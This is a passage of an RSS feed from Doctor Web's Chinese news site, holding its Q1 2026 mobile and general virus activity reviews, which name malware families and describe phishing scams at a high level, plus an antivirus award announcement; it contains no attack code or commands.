        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/02_unwanted_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Program.FakeAntiVirus&amp;lng=cn"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测假冒反病毒软件运行的广告应用。这种应用汇谎报发现安全威胁，诱骗用户支付费用购买完整版本。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Program.FakeMoney&amp;lng=cn"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测据谎称用户通过执行某些操作或任务就可赚钱的应用程序。这些程序模拟奖励累积，称积累到一定的金额就可用“提现”，但实际上用户根本不可能得到任何付款。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Program.CloudInject&amp;lng=cn"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Program.CloudInject&amp;lng=cn"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测经CloudInject云服务和同名安卓工具修改的安卓应用程序（归类为 &lt;a href="https://vms.drweb.cn/search/?q=Tool.CloudInject&amp;lng=cn"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt; 添加至Dr.Web病毒库）。此类程序在远程服务器上进行修改，而有用户（修改者）无法控制修改过程中到底内置了什么。此外，应用程序还会得到一些危险的权限。修改后用户可以远程控制这些程序，包括锁定、显示自定义对话框、跟踪其他软件的安装和删除等。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;一种用于监控安卓设备用户的程序，可读取短信、获取通话信息、追踪设备位置并录制音频。&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;最常见的风险程序&lt;/b&gt;&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/03_riskware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/03_riskware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Tool.Obfuscator.TrashCode&amp;lng=cn"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Tool.Obfuscator.TrashCode&amp;lng=cn"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;使用黑客工具篡改并注入恶意代码的安卓应用。进行篡改的目的是混淆程序逻辑，此技术常见于银行木马和盗版软件。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;使用工具NP Manager修改过的的安卓应用程序。此类程序中嵌入了一个特殊模块，可修改数字签名并绕过验证。所添加的混淆技术通常用于增加恶意软件的侦测分析难度。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Tool.LuckyPatcher&amp;lng=cn"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;一种能够修改已安装安卓应用（为其创建补丁）的工具，功能是改变其运行逻辑或绕过某些限制。例如，用户可借助此工具尝试禁用银行应用对ROOT权限的侦测，或在游戏中获取无限资源。该工具会从网络下载专门编写的脚本来创建补丁，而这些脚本可由任何用户编写并上传至公共数据库。此类脚本可能包含恶意功能，因此生成的补丁可能具有潜在风险。&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;最常见的广告软件&lt;/b&gt;&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/04_adware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/04_adware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Adware.Bastion&amp;lng=cn"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测会定期创建误导性通知的所谓优化程序，这些通知谎称内存不足或存在系统错误，其目的是在所谓“优化”过程中显示广告。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Adware.AdPush&amp;lng=cn"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;一类可嵌入安卓应用的广告模块，通过展示容易误导用户的通知进行广告推送，如将广告伪装成操作系统通知的样式。此外，这些模块还能收集多种敏感数据，并具备下载其他应用并静默触发其安装的能力。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;伪装成游戏作弊工具的应用，实际功能是投放广告。这些程序会从远程服务器接收配置信息，然后加载带有广告的目标网站，包括横幅广告、弹出式广告、视频广告等等。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Adware.Fictus&amp;lng=cn"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;嵌入到热门安卓游戏和应用的克隆版本一种广告模块，利用名为net2share的专用打包工具集成到程序。嵌入广告模块的软件副本通过各种应用目录传播，一旦安装到设备就会显示垃圾广告。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Airpush.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;嵌入在安卓应用中的软件模块，用于显示各种广告。不同版本和变种所显示的广告可以是通知、弹出窗口或横幅广告。攻击者通常利用这些模块传播恶意软件，诱使用户安装特定软件。这些模块还会将各种机密信息传输到远程服务器。&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Google Play中的威胁&lt;/h3&gt;

&lt;p&gt;2026年第一季度，我公司反病毒分析师在Google Play目录中再次发现擅自为用户订阅付费服务的 &lt;a href="https://vms.drweb.cn/search/?q=Android.Joker&amp;lng=cn"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; 家族木马。这些木马程序隐藏在多个安卓优化工具中，还伪装成即时通讯软件、多媒体应用和其他软件进行传播，总下载量至少达37万次。&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/05_Android.Joker.2524.jpg" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/05_Android.Joker.2524.1.jpg"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/06_Android.Joker.2511.jpg" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/06_Android.Joker.2511.1.jpg"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;2026年第一季度在GooglePlay侦测到的 &lt;b&gt;Android.Joker&lt;/b&gt; 恶意软件示例。嵌入 &lt;b&gt;Android.Joker.2511&lt;/b&gt; 的是即时通讯软件PrivateChatMessage，嵌入 &lt;b&gt;Android.Joker.2524&lt;/b&gt; 的是相机应用MagicCamera&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;此外，我们的恶意软件分析师还侦测到恶意软件 &lt;a href="https://vms.drweb.cn/search/?q=Android.Subscription&amp;lng=cn"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.23&lt;/b&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.Subscription&amp;lng=cn"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.24&lt;/b&gt;，功能是为订阅付费服务。这些木马程序会加载一些网站，利用Wap Click技术激活付费移动订阅。这些网站会请求用户提供手机号码，然后尝试自动接通相关服务。这两款恶意应用在Google Play的总下载量已超过150万次。.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/07_Android.Subscription.23.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/07_Android.Subscription.23.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/08_Android.Subscription.24.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_mobile_q1/08_Android.Subscription.24.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Android.Subscription.23&lt;/b&gt; 和 &lt;b&gt;Android.Subscription.24&lt;/b&gt; 恶意软件伪装成个人理财应用程序Stream Hive和PrimeLink进行传播，但其唯一的功能是加载网站，为安卓设备用户接通付费移动服务&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;我们建议用户安装Dr.Web安卓保护产品来保护安卓设备，抵御恶意程序和不良程序。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q1%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;失陷指标&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15135&amp;lng=cn</guid><title>Doctor Web：2026年第一季度病毒活动综述</title><link>https://news.drweb.cn/show/?i=15135&amp;lng=cn&amp;c=5</link><pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;2026.04.01&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Dr.Web产品侦测统计信息显示，2026年第一季度侦测到的威胁总数与去年第四季度相比下降6.77%。独特威胁的数量下降11.98%。最常见的恶意软件类型是不良广告软件、广告木马、恶意软件下载器以及后门程序。&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;电子邮件流量中最常侦测到的是恶意脚本、后门程序和各种木马程序。此外，漏洞利用程序和钓鱼文件也在通过电子邮件传播。&lt;/p&gt;

&lt;p&gt;受到勒索软件感染的用户最常遭遇的加密器是 &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;、&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; 和 &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt;。&lt;/p&gt;

&lt;p&gt;我公司互联网分析师在2026年第一季度发现了一些新的钓鱼网站，是假冒信贷机构和网店的网站及其他一些不良网站。&lt;/p&gt;

&lt;p&gt;移动设备威胁方面主要动态是银行木马活动有所增加，同时我们的病毒分析师还注意到，一种通过在恶意软件中添加垃圾代码来逃避反病毒软件侦测的方法越来越常见。&lt;/p&gt;

&lt;p&gt;1月份我公司通报了利用机器学习和视频流来仿真用户网站点击行为的 &lt;b&gt;Android.Phantom&lt;/b&gt; 点击器木马。此外，在过去的三个月里，我们侦测到Google Play商店出现新的恶意软件，其中有的是为用户订阅付费服务的木马。&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;第一季度主要趋势&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;在受保护设备侦测到的威胁数量减少&lt;/li&gt;
        &lt;li&gt;侦测到的独特威胁数量减少&lt;/li&gt;
        &lt;li&gt;与前三个月相比，文件被勒索软件加密的用户的解密申请数量减少&lt;/li&gt;
        &lt;li&gt;针对安卓设备的银行木马活动持续增加&lt;/li&gt;
        &lt;li&gt;用户受到 &lt;b&gt;Android.Phantom&lt;/b&gt; 点击器恶意软件的威胁，该恶意软件可利用机器学习等技术手段增加网站点击量&lt;/li&gt;
        &lt;li&gt;在应用商店Google Play侦测到新的恶意软件&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Doctor Web统计服务收集的数据&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/01_stat_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/01_stat_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;2026年第一季度最常见威胁：&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;Trojan.Siggen31.34463&lt;/dt&gt;
    &lt;dd&gt;用Go编程语言编写的木马程序，专门用于向目标系统植入各类挖矿工具和广告软件。为DLL文件形式，存储路径为 &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;。木马利用torrent客户端uTorrent的DLL搜索顺序劫持漏洞来进行启动。&lt;/dd&gt;
    &lt;dt&gt;Adware.Downware.20655&lt;/dt&gt;
    &lt;dt&gt;Adware.Downware.20766&lt;/dt&gt;
    &lt;dd&gt;广告软件，是安装盗版程序过程中用到的中间环节程序。&lt;/dd&gt;
    &lt;dt&gt;Trojan.BPlug.4268&lt;/dt&gt;
    &lt;dd&gt;侦测浏览器插件WinSafe的恶意组件。该组件是一个JavaScript脚本，会在浏览器不断显示广告。&lt;/dd&gt;
    &lt;dt&gt;Adware.Siggen.33379&lt;/dt&gt;
    &lt;dd&gt;假冒的浏览器广告拦截器AdblockPlus，由其他恶意应用程序安装到系统，用于显示广告。&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;邮箱流量恶意程序统计数据&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/02_mail_traffic_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/02_mail_traffic_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;2026年第一季度邮箱流量中最常见的威胁：&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;JS.DownLoader.1225&lt;/dt&gt;
    &lt;dd&gt;启发式分析仪侦测到的ZIP压缩文件，其包含的JavaScript脚本名称可疑。&lt;/dd&gt;
    &lt;dt&gt;W97M.DownLoader.2938&lt;/dt&gt;
    &lt;dd&gt;利用MicrosoftOffice文档漏洞的木马下载器家族，功能是将其他恶意软件下载到受攻击的计算机。&lt;/dd&gt;
    &lt;dt&gt;Exploit.CVE-2017-11882.123&lt;/dt&gt;
    &lt;dt&gt;Exploit.CVE-2018-0798.4&lt;/dt&gt;
    &lt;dd&gt;MicrosoftOffice漏洞利用程序，可执行任意代码。&lt;/dd&gt;
    &lt;dt&gt;JS.Redirector.514&lt;/dt&gt;
    &lt;dd&gt;一种恶意脚本，功能是将用户重定向到攻击者所控制的网页。&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;加密器&lt;/h3&gt;

&lt;p&gt;2026年第一季度勒索木马受害者的文件解密申请量较去年第四季度减少31.51%。网络攻击事件减少主要是在新年假期，可能是一些网络犯罪分子暂停了活动，而且，假期也可能让用户未能马上发现已遭受勒索软件攻击。&lt;/p&gt;

&lt;p&gt;Doctor Web公司技术支持部门接收到的解密申请量动态：&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/03_encoder_requests_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/03_encoder_requests_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;2026年第一季度最常见的加密器：&lt;/p&gt;

&lt;ul class="list"&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;—占用户申请的15.59%&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb.cn/search/?q=Trojan.Encoder.29750&amp;lng=cn"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt;—占用户申请的3.23%&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt;—占用户申请的3.23%&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb.cn/search/?q=Trojan.Encoder.26996&amp;lng=cn"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt;—占用户申请的1.62%&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.44383&lt;/b&gt;—占用户申请的1.61%&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;网络诈骗&lt;/h3&gt;

&lt;p&gt;我公司网络分析团队在过去的三个月发现新的虚假网购平台网站。诈骗分子在这些网站“出售”所谓未付款订单。诈骗手法如下：将所谓订单“未收货”商品按类别（电子产品、服装、鞋子、化妆品等）分类，装入相应的盲盒，声称盲盒中可能是很贵重的物品。这些盒子以相对较低的价格出售，这正是其主要诈骗手段所在。&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/04_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/04_market.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;一个声称“订单”无人认领商品清仓处理的假冒购物平台&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;用户选中其中一个盲盒后，系统会提示他们下单并提供个人信息，包括姓名、手机号码和电子邮件地址。之后，用户会被重定向到快速支付系统(FPS)的支付页面。最终，受害者不仅损失了金钱，还将个人信息泄露给了骗子。&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/05_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/05_market.2.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/06_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/06_market.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;受害者下单会被要求通过快速支付系统付款&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;我们的专家还发现许多提供各种金融服务的网站，例如快速获得小额贷款、普通贷款或协助办理破产流程。这些网站并非如用户预期的那样直接提供服务，而是充当客户和金融机构之间的中介，并会收取一定的费用，让用户能浏览到一系列可能合适的选项，而实际上类似的金融产品信息汇总完全可以通过免费的渠道获取。此外，这些网站并不保证用户能申请成功，用户支付的费用并非一次性支付，而是付费订阅，会定期从用户账号扣费。&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/07_finance.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/07_finance.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;让用户通过付费订阅来选择自己感兴趣的金融产品的网站示例&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;某些情况下，这类网站还可能会误导用户，表面上是提供就业服务，而实际上提供的是让用户可访问贷款、小额贷款等金融产品的收费订阅。&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/08_job.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/08_job.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;网站表面是提供求职帮助，但用户付费后看到的并非招聘信息，而是来自网站合作伙伴的金融产品，如贷款、小额贷款和其他类似服务。&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;在第一季度发现的钓鱼网站中有一些是冒充“绿色马拉松”慈善赛的虚假网站。这些网站诱导用户注册参加马拉松，但实际上与赛事无关，目的是窃取用户的隐私信息。&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/09_maraphon.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/09_maraphon.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;“绿色马拉松”虚假网站示例&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;我公司网络分析师再次发现虚假的投资服务网站，这些网站声称与多家信贷机构有关联。其中一些虚假网站分别针对的是俄罗斯、哈萨克斯坦和其他国家的用户。诈骗分子承诺会获得高额回报，但“访问”这些虚假的投资平台需要先填写一份简短的调查问卷并注册包含个人信息的账户。&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/10_phishing_bank.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/10_phishing_bank.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;攻击者冒充俄罗斯某银行投资服务官方资源的钓鱼网站示例&lt;/em&gt;&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/11_phishing_bank.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/april/review_common_q1/11_phishing_bank.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;攻击者冒充哈萨克斯坦某信贷机构投资服务官方资源的钓鱼网站示例&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.drweb.cn/dangerous_urls/"&gt;了解Dr.Web不建议访问网站更多详情&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;移动设备恶意软件和不良软件&lt;/h3&gt;

&lt;p&gt;根据Dr.Web Security Space移动设备保护产品的侦测统计数据，去年第四季度观察到的 &lt;a href="https://vms.drweb.cn/search/?q=Android.Banker&amp;lng=cn"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; 银行木马活动增加的趋势在2026年第一季度得以延续，其中最常见的是 &lt;b&gt;Android.Banker.Mamont&lt;/b&gt; 子家族成员。与此同时，&lt;a href="https://vms.drweb.cn/search/?q=Android.MobiDash&amp;lng=cn"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.HiddenAds&amp;lng=cn"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; 广告木马的侦测数量再次下降&lt;/p&gt;

&lt;p&gt;风险程序中最多是是是使用修改工具注入垃圾代码的程序（侦测为 &lt;a href="https://vms.drweb.cn/search/?q=Tool.Obfuscator.TrashCode&amp;lng=cn"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;）。这种技术目前被广泛用于银行木马，目的是逃避反病毒软件的侦测。此外，使用NPManager工具修改的应用程序（侦测为 &lt;a href="https://vms.drweb.cn/search/?q=Tool.NPMod&amp;lng=cn"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;）也仍常见。&lt;/p&gt;

&lt;p&gt;最常见的不良软件是伪装成杀毒软件的 &lt;a href="https://vms.drweb.cn/search/?q=Program.FakeAntiVirus&amp;lng=cn"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;，要求用户购买完整版才能“处理”其侦测到的所谓威胁。第一季度最活跃的广告软件是 &lt;a href="https://vms.drweb.cn/search/?q=Adware.Bastion&amp;lng=cn"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; 和 &lt;b&gt;Adware.Opensite.15&lt;/b&gt;。前者是所谓的优化应用，会生成内存不足和系统出现错误的通知，目的是在所谓的“优化”过程中展示广告。后者伪装成游戏作弊程序，声称可以获取各种游戏资源，但实际上只会加载广告网站。&lt;/p&gt;

&lt;p&gt;2026年1月我们的反病毒实验室曾&lt;a href="https://news.drweb.cn/show/?i=15110" target="_blank"&gt;通报&lt;/a&gt; &lt;b&gt;Android.Phantom&lt;/b&gt; 点击器木马程序所存在风险。这类恶意应用利用机器学习和视频流技术来仿真用户的网站点击。网络犯罪分子通过多种渠道来传播这些程序，包括小米设备的Get Apps应用商店、Telegram频道、Discord服务器、第三方软件分发渠道以及恶意网站。&lt;/p&gt;

&lt;p&gt;过去三个月，我公司病毒分析师在Google Play应用商店发现新威胁，包括木马程序 &lt;a href="https://vms.drweb.cn/search/?q=Android.Joker&amp;lng=cn"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.Subscription&amp;lng=cn"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;，功能是为用户订阅付费服务。&lt;/p&gt;

&lt;p&gt;第一季度主要移动安全事件：&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;银行木马 &lt;a href="https://vms.drweb.cn/search/?q=Android.Banker&amp;lng=cn"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; 成为安卓设备最常见的威胁&lt;/li&gt;
    &lt;li&gt;网络犯罪分子越来越频繁使用安卓应用修改工具来增强银行木马逃避杀毒软件侦测的能力&lt;/li&gt;
    &lt;li&gt;广告木马 &lt;a href="https://vms.drweb.cn/search/?q=Android.MobiDash&amp;lng=cn"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.HiddenAds&amp;lng=cn"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; 的活动持续下降&lt;/li&gt;
    &lt;li&gt;用户受到木马 &lt;b&gt;Android.Phantom&lt;/b&gt; 的威胁，这类木马利用机器学习和视频流来操纵网站点击量&lt;/li&gt;
    &lt;li&gt;恶意应用仍在通过Google Play传播&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;2026年第一季度份移动威胁更多详情请参阅&lt;a href="https://news.drweb.cn/show/review/?i=15136" target="_blank"&gt;移动威胁综述&lt;/a&gt;。&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15134&amp;lng=cn</guid><title>Dr.Web 个人电脑保护解决方案荣获赛可达优秀产品奖（SKD AWARDS）</title><link>https://news.drweb.cn/show/?i=15134&amp;lng=cn&amp;c=5</link><pubDate>Thu, 26 Mar 2026 17:33:42 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Dr.Web个人电脑保护解决方案Dr.Web Security Space再度荣获赛可达行业奖（SKD AWARDS），被评为“PC端反病毒产品”类别最佳产品。&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;这已是“Doctor Web”公司连续第三年获得此类殊荣。2023年，用于保护Windows电脑的Dr.Web Security Space 12.0摘得“个人电脑安全”类别桂冠；2024年，此个人电脑反病毒解决方案再次荣膺最佳，而Dr.Web Mobile Engine SDK也同时在“反病毒引擎”类别中胜出。&lt;/p&gt;&lt;p&gt;SKD AWARDS是由全球知名的信息安全测试与认证独立实验室——赛可达实验室（SKD Labs）主办评测的年度奖项，常被誉为“网络安全产品界的奥斯卡”，是评估专业产品效能的重要标杆之一。&lt;/p&gt;&lt;p&gt;在评审过程中，参评产品需经过一系列测试，获得功能、性能、技术创新、真实场景表现、威胁侦测能力及响应能力上的全面评估。&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.cn/static/f2_admin/drweb-ss.jpg" data-fancybox=""&gt;&lt;img src="https://st.drweb.cn/static/new-www/news/2026/drweb-ss.jpg" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15121&amp;lng=cn</guid><title>迎马年新春特惠！Dr.Web Security Space 